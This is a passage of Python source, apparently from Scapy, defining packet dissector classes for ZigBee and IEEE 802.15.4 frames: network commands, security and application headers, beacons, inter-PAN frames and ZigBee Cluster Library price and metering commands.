update\"\n # 0x0b - 0xff reserved\n }),\n\n # - Route Request Command - #\n # Command options (1 octet)\n ConditionalField(BitField(\"reserved\", 0, 1), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(BitField(\"multicast\", 0, 1), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(BitField(\"dest_addr_bit\", 0, 1), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(\n BitEnumField(\"many_to_one\", 0, 2, {\n 0: \"not_m2one\", 1: \"m2one_support_rrt\", 2: \"m2one_no_support_rrt\", 3: \"reserved\"}\n ), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(BitField(\"reserved\", 0, 3), lambda pkt: pkt.cmd_identifier == 1),\n # Route request identifier (1 octet)\n ConditionalField(ByteField(\"route_request_identifier\", 0), lambda pkt: pkt.cmd_identifier == 1),\n # Destination address (2 octets)\n ConditionalField(XLEShortField(\"destination_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 1),\n # Path cost (1 octet)\n ConditionalField(ByteField(\"path_cost\", 0), lambda pkt: pkt.cmd_identifier == 1),\n # Destination IEEE Address (0/8 octets), only present when dest_addr_bit has a value of 1\n ConditionalField(dot15d4AddressField(\"ext_dst\", 0, adjust=lambda pkt, x: 8),\n lambda pkt: (pkt.cmd_identifier == 1 and pkt.dest_addr_bit == 1)),\n\n # - Route Reply Command - #\n # Command options (1 octet)\n ConditionalField(BitField(\"reserved\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"multicast\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"responder_addr_bit\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"originator_addr_bit\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"reserved\", 0, 4), lambda pkt: pkt.cmd_identifier == 2),\n # Route request identifier (1 octet)\n ConditionalField(ByteField(\"route_request_identifier\", 0), lambda pkt: pkt.cmd_identifier == 2),\n # Originator address (2 octets)\n ConditionalField(XLEShortField(\"originator_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 2),\n # Responder address (2 octets)\n ConditionalField(XLEShortField(\"responder_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 2),\n # Path cost (1 octet)\n ConditionalField(ByteField(\"path_cost\", 0), lambda pkt: 
pkt.cmd_identifier == 2),\n # Originator IEEE address (0/8 octets)\n ConditionalField(dot15d4AddressField(\"originator_addr\", 0, adjust=lambda pkt, x: 8),\n lambda pkt: (pkt.cmd_identifier == 2 and pkt.originator_addr_bit == 1)),\n # Responder IEEE address (0/8 octets)\n ConditionalField(dot15d4AddressField(\"responder_addr\", 0, adjust=lambda pkt, x: 8),\n lambda pkt: (pkt.cmd_identifier == 2 and pkt.responder_addr_bit == 1)),\n\n # - Network Status Command - #\n # Status code (1 octet)\n ConditionalField(ByteEnumField(\"status_code\", 0, {\n 0x00: \"No route available\",\n 0x01: \"Tree link failure\",\n 0x02: \"Non-tree link failure\",\n 0x03: \"Low battery level\",\n 0x04: \"No routing capacity\",\n 0x05: \"No indirect capacity\",\n 0x06: \"Indirect transaction expiry\",\n 0x07: \"Target device unavailable\",\n 0x08: \"Target address unallocated\",\n 0x09: \"Parent link failure\",\n 0x0a: \"Validate route\",\n 0x0b: \"Source route failure\",\n 0x0c: \"Many-to-one route failure\",\n 0x0d: \"Address conflict\",\n 0x0e: \"Verify addresses\",\n 0x0f: \"PAN identifier update\",\n 0x10: \"Network address update\",\n 0x11: \"Bad frame counter\",\n 0x12: \"Bad key sequence number\",\n # 0x13 - 0xff Reserved\n }), lambda pkt: pkt.cmd_identifier == 3),\n # Destination address (2 octets)\n ConditionalField(XLEShortField(\"destination_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 3),\n\n # - Leave Command - #\n # Command options (1 octet)\n # Bit 7: Remove children\n ConditionalField(BitField(\"remove_children\", 0, 1), lambda pkt: pkt.cmd_identifier == 4),\n # Bit 6: Request\n ConditionalField(BitField(\"request\", 0, 1), lambda pkt: pkt.cmd_identifier == 4),\n # Bit 5: Rejoin\n ConditionalField(BitField(\"rejoin\", 0, 1), lambda pkt: pkt.cmd_identifier == 4),\n # Bit 0 - 4: Reserved\n ConditionalField(BitField(\"reserved\", 0, 5), lambda pkt: pkt.cmd_identifier == 4),\n\n # - Route Record Command - #\n # Relay count (1 octet)\n ConditionalField(ByteField(\"rr_relay_count\", 0), lambda pkt: pkt.cmd_identifier == 5),\n # Relay list (variable in length)\n ConditionalField(\n FieldListField(\"rr_relay_list\", [], XLEShortField(\"\", 0x0000), count_from=lambda pkt:pkt.rr_relay_count),\n lambda pkt:pkt.cmd_identifier == 5),\n\n # - Rejoin Request Command - #\n # Capability Information (1 octet)\n ConditionalField(BitField(\"allocate_address\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Allocate Address\n ConditionalField(BitField(\"security_capability\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Security Capability\n ConditionalField(BitField(\"reserved2\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # bit 5 is reserved\n ConditionalField(BitField(\"reserved1\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # bit 4 is reserved\n ConditionalField(BitField(\"receiver_on_when_idle\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Receiver On When Idle\n ConditionalField(BitField(\"power_source\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Power Source\n ConditionalField(BitField(\"device_type\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Device Type\n ConditionalField(BitField(\"alternate_pan_coordinator\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Alternate PAN Coordinator\n\n # - Rejoin Response Command - #\n # Network address (2 octets)\n ConditionalField(XLEShortField(\"network_address\", 0xFFFF), lambda pkt:pkt.cmd_identifier == 7),\n # Rejoin status (1 octet)\n ConditionalField(ByteField(\"rejoin_status\", 0), lambda pkt:pkt.cmd_identifier == 7),\n\n # - Link Status Command - 
#\n # Command options (1 octet)\n ConditionalField(BitField(\"reserved\", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Reserved\n ConditionalField(BitField(\"last_frame\", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Last frame\n ConditionalField(BitField(\"first_frame\", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # First frame\n ConditionalField(BitField(\"entry_count\", 0, 5), lambda pkt:pkt.cmd_identifier == 8), # Entry count\n # Link status list (variable size)\n ConditionalField(\n PacketListField(\"link_status_list\", [], LinkStatusEntry, count_from=lambda pkt:pkt.entry_count),\n lambda pkt:pkt.cmd_identifier == 8),\n\n # - Network Report Command - #\n # Command options (1 octet)\n ConditionalField(\n BitEnumField(\"report_command_identifier\", 0, 3, {0: \"PAN identifier conflict\"}), # 0x01 - 0x07 Reserved\n lambda pkt: pkt.cmd_identifier == 9),\n ConditionalField(BitField(\"report_information_count\", 0, 5), lambda pkt: pkt.cmd_identifier == 9),\n # EPID: Extended PAN ID (8 octets)\n ConditionalField(dot15d4AddressField(\"epid\", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier == 9),\n # Report information (variable length)\n # Only present if we have a PAN Identifier Conflict Report\n ConditionalField(\n FieldListField(\"PAN_ID_conflict_report\", [], XLEShortField(\"\", 0x0000),\n count_from=lambda pkt:pkt.report_information_count),\n lambda pkt:(pkt.cmd_identifier == 9 and pkt.report_command_identifier == 0)\n ),\n\n # - Network Update Command - #\n # Command options (1 octet)\n ConditionalField(\n BitEnumField(\"update_command_identifier\", 0, 3, {0: \"PAN Identifier Update\"}), # 0x01 - 0x07 Reserved\n lambda pkt: pkt.cmd_identifier == 10),\n ConditionalField(BitField(\"update_information_count\", 0, 5), lambda pkt: pkt.cmd_identifier == 10),\n # EPID: Extended PAN ID (8 octets)\n ConditionalField(dot15d4AddressField(\"epid\", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier == 10),\n # Update Id (1 octet)\n ConditionalField(ByteField(\"update_id\", 0), lambda pkt: pkt.cmd_identifier == 10),\n # Update Information (Variable)\n # Only present if we have a PAN Identifier Update\n # New PAN ID (2 octets)\n ConditionalField(XLEShortField(\"new_PAN_ID\", 0x0000),\n lambda pkt: (pkt.cmd_identifier == 10 and pkt.update_command_identifier == 0)),\n\n # StrLenField(\"data\", \"\", length_from=lambda pkt, s:len(s)),\n ]\n\n\ndef util_mic_len(pkt):\n ''' Calculate the length of the attribute value field '''\n if (pkt.nwk_seclevel == 0): # no encryption, no mic\n return 0\n elif (pkt.nwk_seclevel == 1): # MIC-32\n return 4\n elif (pkt.nwk_seclevel == 2): # MIC-64\n return 8\n elif (pkt.nwk_seclevel == 3): # MIC-128\n return 16\n elif (pkt.nwk_seclevel == 4): # ENC\n return 0\n elif (pkt.nwk_seclevel == 5): # ENC-MIC-32\n return 4\n elif (pkt.nwk_seclevel == 6): # ENC-MIC-64\n return 8\n elif (pkt.nwk_seclevel == 7): # ENC-MIC-128\n return 16\n else:\n return 0\n\n\nclass ZigbeeSecurityHeader(Packet):\n name = \"Zigbee Security Header\"\n fields_desc = [\n # Security control (1 octet)\n FlagsField(\"reserved1\", 0, 2, ['reserved1', 'reserved2']),\n BitField(\"extended_nonce\", 1, 1), # set to 1 if the sender address field is present (source)\n # Key identifier\n BitEnumField(\"key_type\", 1, 2, {\n 0: 'data_key',\n 1: 'network_key',\n 2: 'key_transport_key',\n 3: 'key_load_key'\n }),\n # Security level (3 bits)\n BitEnumField(\"nwk_seclevel\", 0, 3, {\n 0: \"None\",\n 1: \"MIC-32\",\n 2: \"MIC-64\",\n 3: \"MIC-128\",\n 4: \"ENC\",\n 5: \"ENC-MIC-32\",\n 6: 
\"ENC-MIC-64\",\n 7: \"ENC-MIC-128\"\n }),\n # Frame counter (4 octets)\n XLEIntField(\"fc\", 0), # provide frame freshness and prevent duplicate frames\n # Source address (0/8 octets)\n ConditionalField(dot15d4AddressField(\"source\", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.extended_nonce),\n # Key sequence number (0/1 octet): only present when key identifier is 1 (network key)\n ConditionalField(ByteField(\"key_seqnum\", 0), lambda pkt: pkt.getfieldval(\"key_type\") == 1),\n # Payload\n # the length of the encrypted data is the payload length minus the MIC\n StrLenField(\"data\", \"\", length_from=lambda pkt, s: len(s) - util_mic_len(pkt)),\n # Message Integrity Code (0/variable in size), length depends on nwk_seclevel\n StrLenField(\"mic\", \"\", length_from=lambda pkt: util_mic_len(pkt)),\n ]\n\n\nclass ZigbeeAppDataPayload(Packet):\n name = \"Zigbee Application Layer Data Payload (General APS Frame Format)\"\n fields_desc = [\n # Frame control (1 octet)\n FlagsField(\"frame_control\", 2, 4, ['reserved1', 'security', 'ack_req', 'extended_hdr']),\n BitEnumField(\"delivery_mode\", 0, 2, {0: 'unicast', 1: 'indirect', 2: 'broadcast', 3: 'group_addressing'}),\n BitEnumField(\"aps_frametype\", 0, 2, {0: 'data', 1: 'command', 2: 'ack'}),\n # Destination endpoint (0/1 octet)\n ConditionalField(ByteField(\"dst_endpoint\", 10), lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)),\n # Group address (0/2 octets) TODO\n # Cluster identifier (0/2 octets)\n ConditionalField(EnumField(\"cluster\", 0, _zcl_cluster_identifier, fmt=\"<H\"), # unsigned short (little-endian)\n lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)\n ),\n # Profile identifier (0/2 octets)\n ConditionalField(EnumField(\"profile\", 0, _zcl_profile_identifier, fmt=\"<H\"),\n lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)\n ),\n # Source endpoint (0/1 octets)\n ConditionalField(ByteField(\"src_endpoint\", 10), lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)),\n # APS counter (1 octet)\n ByteField(\"counter\", 0),\n # optional extended header\n # variable length frame payload: 3 frame types: data, APS command, and acknowledgement\n # ConditionalField(StrLenField(\"data\", \"\", length_from=lambda pkt, s:len(s)), lambda pkt:pkt.aps_frametype == 0),\n ]\n\n def guess_payload_class(self, payload):\n if self.frame_control & 0x02: # we have a security header\n return ZigbeeSecurityHeader\n elif self.aps_frametype == 0: # data\n return ZigbeeClusterLibrary # TODO might also be another frame\n elif self.aps_frametype == 1: # command\n return ZigbeeAppCommandPayload\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass ZigbeeAppCommandPayload(Packet):\n name = \"Zigbee Application Layer Command Payload\"\n fields_desc = [\n ByteEnumField(\"cmd_identifier\", 1, {\n 1: \"APS_CMD_SKKE_1\",\n 2: \"APS_CMD_SKKE_2\",\n 3: \"APS_CMD_SKKE_3\",\n 4: \"APS_CMD_SKKE_4\",\n 5: \"APS_CMD_TRANSPORT_KEY\",\n 6: \"APS_CMD_UPDATE_DEVICE\",\n 7: \"APS_CMD_REMOVE_DEVICE\",\n 8: \"APS_CMD_REQUEST_KEY\",\n 9: \"APS_CMD_SWITCH_KEY\",\n 10: \"APS_CMD_EA_INIT_CHLNG\",\n 11: \"APS_CMD_EA_RSP_CHLNG\",\n 12: \"APS_CMD_EA_INIT_MAC_DATA\",\n 13: \"APS_CMD_EA_RSP_MAC_DATA\",\n 14: \"APS_CMD_TUNNEL\"\n }),\n StrLenField(\"data\", \"\", length_from=lambda pkt, s: len(s)),\n ]\n\n# Utility Functions #\n\n\ndef util_srcpanid_present(pkt):\n '''A source PAN ID is included if and only if both src addr mode != 0 and PAN ID Compression in FCF == 0'''\n if 
(pkt.underlayer.getfieldval(\"fcf_srcaddrmode\") != 0) and (pkt.underlayer.getfieldval(\"fcf_panidcompress\") == 0):\n return True\n else:\n return False\n\n# Do a CRC-CCITT Kermit 16bit on the data given\n# Returns a CRC that is the FCS for the frame\n# Implemented using pseudocode from: June 1986, Kermit Protocol Manual\n# See also: http://regregex.bbcmicro.net/crc-catalogue.htm#crc.cat.kermit\n\n\ndef makeFCS(data):\n crc = 0\n for i in range(0, len(data)):\n c = orb(data[i])\n q = (crc ^ c) & 15 # Do low-order 4 bits\n crc = (crc // 16) ^ (q * 4225)\n q = (crc ^ (c // 16)) & 15 # And high 4 bits\n crc = (crc // 16) ^ (q * 4225)\n return struct.pack('<H', crc) # return as bytes in little endian order\n\n\nclass Dot15d4CmdAssocReq(Packet):\n name = \"802.15.4 Association Request Payload\"\n fields_desc = [\n BitField(\"allocate_address\", 0, 1), # Allocate Address\n BitField(\"security_capability\", 0, 1), # Security Capability\n BitField(\"reserved2\", 0, 1), # bit 5 is reserved\n BitField(\"reserved1\", 0, 1), # bit 4 is reserved\n BitField(\"receiver_on_when_idle\", 0, 1), # Receiver On When Idle\n BitField(\"power_source\", 0, 1), # Power Source\n BitField(\"device_type\", 0, 1), # Device Type\n BitField(\"alternate_pan_coordinator\", 0, 1), # Alternate PAN Coordinator\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Association Request Payload ( Alt PAN Coord: %Dot15d4CmdAssocReq.alternate_pan_coordinator% Device Type: %Dot15d4CmdAssocReq.device_type% )\")\n\n\nclass Dot15d4CmdAssocResp(Packet):\n name = \"802.15.4 Association Response Payload\"\n fields_desc = [\n XLEShortField(\"short_address\", 0xFFFF), # Address assigned to device from coordinator (0xFFFF == none)\n # Association Status\n # 0x00 == successful\n # 0x01 == PAN at capacity\n # 0x02 == PAN access denied\n # 0x03 - 0x7f == Reserved\n # 0x80 - 0xff == Reserved for MAC primitive enumeration values\n ByteEnumField(\"association_status\", 0x00, {0: 'successful', 1: 'PAN_at_capacity', 2: 'PAN_access_denied'}),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Association Response Payload ( Association Status: %Dot15d4CmdAssocResp.association_status% Assigned Address: %Dot15d4CmdAssocResp.short_address% )\")\n\n\nclass Dot15d4CmdDisassociation(Packet):\n name = \"802.15.4 Disassociation Notification Payload\"\n fields_desc = [\n # Disassociation Reason\n # 0x00 == Reserved\n # 0x01 == The coordinator wishes the device to leave the PAN\n # 0x02 == The device wishes to leave the PAN\n # 0x03 - 0x7f == Reserved\n # 0x80 - 0xff == Reserved for MAC primitive enumeration values\n ByteEnumField(\"disassociation_reason\", 0x02, {1: 'coord_wishes_device_to_leave', 2: 'device_wishes_to_leave'}),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Disassociation Notification Payload ( Disassociation Reason %Dot15d4CmdDisassociation.disassociation_reason% )\")\n\n\nclass Dot15d4CmdGTSReq(Packet):\n name = \"802.15.4 GTS request command\"\n fields_desc = [\n # GTS Characteristics field (1 octet)\n # Reserved (bits 6-7)\n BitField(\"reserved\", 0, 2),\n # Characteristics Type (bit 5)\n BitField(\"charact_type\", 0, 1),\n # GTS Direction (bit 4)\n BitField(\"gts_dir\", 0, 1),\n # GTS Length (bits 0-3)\n BitField(\"gts_len\", 0, 4),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 GTS Request Command ( %Dot15d4CmdGTSReq.gts_len% : %Dot15d4CmdGTSReq.gts_dir% )\")\n\n# PAN ID conflict notification command frame is not necessary, only Dot15d4Cmd with cmd_id = 5 (\"PANIDConflictNotify\")\n# 
Orphan notification command not necessary, only Dot15d4Cmd with cmd_id = 6 (\"OrphanNotify\")\n\n\nclass ZigBeeBeacon(Packet):\n name = \"ZigBee Beacon Payload\"\n fields_desc = [\n # Protocol ID (1 octet)\n ByteField(\"proto_id\", 0),\n # nwkcProtocolVersion (4 bits)\n BitField(\"nwkc_protocol_version\", 0, 4),\n # Stack profile (4 bits)\n BitField(\"stack_profile\", 0, 4),\n # End device capacity (1 bit)\n BitField(\"end_device_capacity\", 0, 1),\n # Device depth (4 bits)\n BitField(\"device_depth\", 0, 4),\n # Router capacity (1 bit)\n BitField(\"router_capacity\", 0, 1),\n # Reserved (2 bits)\n BitField(\"reserved\", 0, 2),\n # Extended PAN ID (8 octets)\n dot15d4AddressField(\"extended_pan_id\", 0, adjust=lambda pkt, x: 8),\n # Tx offset (3 bytes)\n # In ZigBee 2006 the Tx-Offset is optional, while in the 2007 and later versions, the Tx-Offset is a required value.\n BitField(\"tx_offset\", 0, 24),\n # Update ID (1 octet)\n ByteField(\"update_id\", 0),\n ]\n\n\n# Inter-PAN Transmission #\nclass ZigbeeNWKStub(Packet):\n name = \"Zigbee Network Layer for Inter-PAN Transmission\"\n fields_desc = [\n # NWK frame control\n BitField(\"reserved\", 0, 2), # remaining subfields shall have a value of 0\n BitField(\"proto_version\", 2, 4),\n BitField(\"frametype\", 0b11, 2), # 0b11 (3) is a reserved frame type\n BitField(\"reserved\", 0, 8), # remaining subfields shall have a value of 0\n ]\n\n def guess_payload_class(self, payload):\n if self.frametype == 0b11:\n return ZigbeeAppDataPayloadStub\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass ZigbeeAppDataPayloadStub(Packet):\n name = \"Zigbee Application Layer Data Payload for Inter-PAN Transmission\"\n fields_desc = [\n FlagsField(\"frame_control\", 0, 4, ['reserved1', 'security', 'ack_req', 'extended_hdr']),\n BitEnumField(\"delivery_mode\", 0, 2, {0: 'unicast', 2: 'broadcast', 3: 'group'}),\n BitField(\"frametype\", 3, 2), # value 0b11 (3) is a reserved frame type\n # Group Address present only when delivery mode field has a value of 0b11 (group delivery mode)\n ConditionalField(\n XLEShortField(\"group_addr\", 0x0), # 16-bit identifier of the group\n lambda pkt: pkt.getfieldval(\"delivery_mode\") == 0b11\n ),\n # Cluster identifier\n EnumField(\"cluster\", 0, _zcl_cluster_identifier, fmt=\"<H\"), # unsigned short (little-endian)\n # Profile identifier\n EnumField(\"profile\", 0, _zcl_profile_identifier, fmt=\"<H\"),\n # ZigBee Payload\n ConditionalField(\n StrLenField(\"data\", \"\", length_from=lambda pkt, s: len(s)),\n lambda pkt: pkt.frametype == 3\n ),\n ]\n\n# ZigBee Cluster Library #\n\n\ndef util_zcl_attribute_value_len(pkt):\n # Calculate the length of the attribute value field\n if (pkt.attribute_data_type == 0x00): # no data\n return 0\n elif (pkt.attribute_data_type == 0x08): # 8-bit data\n return 1\n elif (pkt.attribute_data_type == 0x09): # 16-bit data\n return 2\n elif (pkt.attribute_data_type == 0x0a): # 24-bit data\n return 3\n elif (pkt.attribute_data_type == 0x0b): # 32-bit data\n return 4\n elif (pkt.attribute_data_type == 0x0c): # 40-bit data\n return 5\n elif (pkt.attribute_data_type == 0x0d): # 48-bit data\n return 6\n elif (pkt.attribute_data_type == 0x0e): # 56-bit data\n return 7\n elif (pkt.attribute_data_type == 0x0f): # 64-bit data\n return 8\n elif (pkt.attribute_data_type == 0x10): # boolean\n return 1\n elif (pkt.attribute_data_type == 0x18): # 8-bit bitmap\n return 1\n elif (pkt.attribute_data_type == 0x19): # 16-bit bitmap\n return 2\n elif (pkt.attribute_data_type == 0x1a): # 24-bit 
bitmap\n return 3\n elif (pkt.attribute_data_type == 0x1b): # 32-bit bitmap\n return 4\n elif (pkt.attribute_data_type == 0x1c): # 40-bit bitmap\n return 5\n elif (pkt.attribute_data_type == 0x1d): # 48-bit bitmap\n return 6\n elif (pkt.attribute_data_type == 0x1e): # 46-bit bitmap\n return 7\n elif (pkt.attribute_data_type == 0x1f): # 64-bit bitmap\n return 8\n elif (pkt.attribute_data_type == 0x20): # Unsigned 8-bit integer\n return 1\n elif (pkt.attribute_data_type == 0x21): # Unsigned 16-bit integer\n return 2\n elif (pkt.attribute_data_type == 0x22): # Unsigned 24-bit integer\n return 3\n elif (pkt.attribute_data_type == 0x23): # Unsigned 32-bit integer\n return 4\n elif (pkt.attribute_data_type == 0x24): # Unsigned 40-bit integer\n return 5\n elif (pkt.attribute_data_type == 0x25): # Unsigned 48-bit integer\n return 6\n elif (pkt.attribute_data_type == 0x26): # Unsigned 56-bit integer\n return 7\n elif (pkt.attribute_data_type == 0x27): # Unsigned 64-bit integer\n return 8\n elif (pkt.attribute_data_type == 0x28): # Signed 8-bit integer\n return 1\n elif (pkt.attribute_data_type == 0x29): # Signed 16-bit integer\n return 2\n elif (pkt.attribute_data_type == 0x2a): # Signed 24-bit integer\n return 3\n elif (pkt.attribute_data_type == 0x2b): # Signed 32-bit integer\n return 4\n elif (pkt.attribute_data_type == 0x2c): # Signed 40-bit integer\n return 5\n elif (pkt.attribute_data_type == 0x2d): # Signed 48-bit integer\n return 6\n elif (pkt.attribute_data_type == 0x2e): # Signed 56-bit integer\n return 7\n elif (pkt.attribute_data_type == 0x2f): # Signed 64-bit integer\n return 8\n elif (pkt.attribute_data_type == 0x30): # 8-bit enumeration\n return 1\n elif (pkt.attribute_data_type == 0x31): # 16-bit enumeration\n return 2\n elif (pkt.attribute_data_type == 0x38): # Semi-precision\n return 2\n elif (pkt.attribute_data_type == 0x39): # Single precision\n return 4\n elif (pkt.attribute_data_type == 0x3a): # Double precision\n return 8\n elif (pkt.attribute_data_type == 0x41): # Octet string\n return int(pkt.attribute_value[0]) # defined in first octet\n elif (pkt.attribute_data_type == 0x42): # Character string\n return int(pkt.attribute_value[0]) # defined in first octet\n elif (pkt.attribute_data_type == 0x43): # Long octet string\n return int(pkt.attribute_value[0:2]) # defined in first two octets\n elif (pkt.attribute_data_type == 0x44): # Long character string\n return int(pkt.attribute_value[0:2]) # defined in first two octets\n # TODO implement Ordered sequence & collection\n elif (pkt.attribute_data_type == 0xe0): # Time of day\n return 4\n elif (pkt.attribute_data_type == 0xe1): # Date\n return 4\n elif (pkt.attribute_data_type == 0xe2): # UTCTime\n return 4\n elif (pkt.attribute_data_type == 0xe8): # Cluster ID\n return 2\n elif (pkt.attribute_data_type == 0xe9): # Attribute ID\n return 2\n elif (pkt.attribute_data_type == 0xea): # BACnet OID\n return 4\n elif (pkt.attribute_data_type == 0xf0): # IEEE address\n return 8\n elif (pkt.attribute_data_type == 0xf1): # 128-bit security key\n return 16\n elif (pkt.attribute_data_type == 0xff): # Unknown\n return 0\n else:\n return 0\n\n\nclass ZCLReadAttributeStatusRecord(Packet):\n name = \"ZCL Read Attribute Status Record\"\n fields_desc = [\n # Attribute Identifier\n XLEShortField(\"attribute_identifier\", 0),\n # Status\n ByteEnumField(\"status\", 0, _zcl_enumerated_status_values),\n # Attribute data type (0/1 octet), only included if status == 0x00 (SUCCESS)\n ConditionalField(\n ByteEnumField(\"attribute_data_type\", 0, 
_zcl_attribute_data_types),\n lambda pkt:pkt.status == 0x00\n ),\n # Attribute data (0/variable in size), only included if status == 0x00 (SUCCESS)\n ConditionalField(\n StrLenField(\"attribute_value\", \"\", length_from=lambda pkt:util_zcl_attribute_value_len(pkt)),\n lambda pkt:pkt.status == 0x00\n ),\n ]\n\n\nclass ZCLGeneralReadAttributes(Packet):\n name = \"General Domain: Command Frame Payload: read_attributes\"\n fields_desc = [\n FieldListField(\"attribute_identifiers\", [], XLEShortField(\"\", 0x0000)),\n ]\n\n\nclass ZCLGeneralReadAttributesResponse(Packet):\n name = \"General Domain: Command Frame Payload: read_attributes_response\"\n fields_desc = [\n PacketListField(\"read_attribute_status_record\", [], ZCLReadAttributeStatusRecord),\n ]\n\n\nclass ZCLMeteringGetProfile(Packet):\n name = \"Metering Cluster: Get Profile Command (Server: Received)\"\n fields_desc = [\n # Interval Channel (8-bit Enumeration): 1 octet\n ByteField(\"Interval_Channel\", 0), # 0 == Consumption Delivered ; 1 == Consumption Received\n # End Time (UTCTime): 4 octets\n XLEIntField(\"End_Time\", 0x00000000),\n # NumberOfPeriods (Unsigned 8-bit Integer): 1 octet\n ByteField(\"NumberOfPeriods\", 1), # Represents the number of intervals being requested.\n ]\n\n\nclass ZCLPriceGetCurrentPrice(Packet):\n name = \"Price Cluster: Get Current Price Command (Server: Received)\"\n fields_desc = [\n BitField(\"reserved\", 0, 7),\n BitField(\"Requestor_Rx_On_When_Idle\", 0, 1),\n ]\n\n\nclass ZCLPriceGetScheduledPrices(Packet):\n name = \"Price Cluster: Get Scheduled Prices Command (Server: Received)\"\n fields_desc = [\n XLEIntField(\"start_time\", 0x00000000), # UTCTime (4 octets)\n ByteField(\"number_of_events\", 0), # Number of Events (1 octet)\n ]\n\n\nclass ZCLPricePublishPrice(Packet):\n name = \"Price Cluster: Publish Price Command (Server: Generated)\"\n fields_desc = [\n XLEIntField(\"provider_id\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n # Rate Label is a UTF-8 encoded Octet String (0-12 octets). 
The first Octet indicates the length.\n StrLenField(\"rate_label\", \"\", length_from=lambda pkt:int(pkt.rate_label[0])), # TODO verify\n XLEIntField(\"issuer_event_id\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n XLEIntField(\"current_time\", 0x00000000), # UTCTime (4 octets)\n ByteField(\"unit_of_measure\", 0), # 8 bits enumeration (1 octet)\n XLEShortField(\"currency\", 0x0000), # Unsigned 16-bit Integer (2 octets)\n ByteField(\"price_trailing_digit\", 0), # 8-bit BitMap (1 octet)\n ByteField(\"number_of_price_tiers\", 0), # 8-bit BitMap (1 octet)\n XLEIntField(\"start_time\", 0x00000000), # UTCTime (4 octets)\n XLEShortField(\"duration_in_minutes\", 0x0000), # Unsigned 16-bit Integer (2 octets)\n XLEIntField(\"price\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n ByteField(\"price_ratio\", 0), # Unsigned 8-bit Integer (1 octet)\n XLEIntField(\"generation_price\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n ByteField(\"generation_price_ratio\", 0), # Unsigned 8-bit Integer (1 octet)\n XLEIntField(\"alternate_cost_delivered\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n ByteField(\"alternate_cost_unit\", 0), # 8-bit enumeration (1 octet)\n ByteField(\"alternate_cost_trailing_digit\", 0), # 8-bit BitMap (1 octet)\n ByteField(\"number_of_block_thresholds\", 0), # 8-bit BitMap (1 octet)\n ByteField(\"price_control\", 0), # 8-bit BitMap (1 octet)\n ]\n\n\nclass ZigbeeClusterLibrary(Packet):\n name = \"Zigbee Cluster Library (ZCL) Frame\"\n fields_desc = [\n # Frame control (8 bits)\n BitField(\"reserved\", 0, 3),\n BitField(\"disable_default_response\", 0, 1), # 0 default response command will be returned\n BitField(\"direction\", 0, 1), # 0 command sent from client to server; 1 command sent from server to client\n BitField(\"manufacturer_specific\", 0, 1), # 0 manufacturer code shall not be included in the ZCL frame\n # Frame Type\n # 0b00 command acts across the entire profile\n # 0b01 command is specific to a cluster\n # 0b10 - 0b11 reserved\n BitEnumField(\"zcl_frametype\", 0, 2, {0: 'profile-wide', 1: 'cluster-specific', 2: 'reserved2', 3: 'reserved3'}),\n # Manufacturer code (0/16 bits) only present then manufacturer_specific field is set to 1\n ConditionalField(XLEShortField(\"manufacturer_code\", 0x0),\n lambda pkt: pkt.getfieldval(\"manufacturer_specific\") == 1\n ),\n # Transaction sequence number (8 bits)\n ByteField(\"transaction_sequence\", 0),\n # Command identifier (8 bits): the cluster command\n ByteField(\"command_identifier\", 0),\n ]\n\n def guess_payload_class(self, payload):\n # Profile-wide commands\n if self.zcl_frametype == 0x00 and self.command_identifier == 0x00:\n return ZCLGeneralReadAttributes\n elif self.zcl_frametype == 0x00 and self.command_identifier == 0x01:\n return ZCLGeneralReadAttributesResponse\n # Cluster-specific commands\n elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.direction == 0 and self.underlayer.cluster == 0x0700: # \"price\"\n return ZCLPriceGetCurrentPrice\n elif self.zcl_frametype == 0x01 and self.command_identifier == 0x01 and self.direction == 0 and self.underlayer.cluster == 0x0700: # \"price\"\n return ZCLPriceGetScheduledPrices\n elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.direction == 1 and self.underlayer.cluster == 0x0700: # \"price\"\n return ZCLPricePublishPrice\n else:\n return 